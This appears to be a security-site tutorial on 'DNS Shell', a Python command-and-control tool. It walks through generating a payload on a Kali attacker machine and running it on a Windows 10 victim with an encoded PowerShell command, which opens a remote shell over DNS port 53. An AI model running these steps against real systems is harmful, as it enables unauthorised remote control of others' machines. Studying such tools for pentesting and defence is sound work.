Tuesday, November 12, 2024
HomeExploitation ToolsDNS Shell - Tool to Compromise and Maintain Control Over Victim Machine

DNS Shell – Tool to Compromise and Maintain Control Over Victim Machine

Published on

Malware protection

DNS Shell protocol runs on the application layer of the TCP/IP Model. When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination server acts as the backdoor.

Tool is a python-based Exploitation tool to compromise and also maintain access via command and control to the server.

Must Read Complete Kali Tools tutorials from Information gathering to Forensics

- Advertisement - SIEM as a Service

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

ATTACKER MACHINE

  • Download the SHELL tool HERE
  • Execute the command: python DNS-SHELL.py
  • It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as the Ip address provided (Kali Linux IP)

Generating Payload – DNS Shell

  • The above Figure is in Recursive mode.
  • Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>

NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d

  • The above figure shows recursive mode has generated a payload.

Victims Machine

  • Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>

BACK TO THE ATTACKERS MACHINE

  • Once the payload is executed in the victim’s machine. The shell of the Windows 10 machine is obtained.
  • The above Figure shows destination (windows 10) now acts as a backdoor and the command is entered and turned to Convert Channel to over port 53 of DNS.Happy Hacking !!!

You can follow us on Linkedin, Twitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.

Latest articles

10 Best DNS Management Tools – 2025

Best DNS Management Tools play a crucial role in efficiently managing domain names and...

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Embargo Ransomware Actors Abuses Safe Mode To Disable Security Solutions

In July 2024, the ransomware group Embargo targeted US companies using the malicious loader...

SMB Force-Authentication Vulnerability Impacts All OPA Versions For Windows

Open Policy Agent (OPA) recently patched a critical vulnerability that could have exposed NTLM...

Hackers Exploiting Selenium Grid Tool To Deploy Exploit Kit & Proxyjacker

Two campaigns targeting Selenium Grid's default lack of authentication are underway, as threat actors...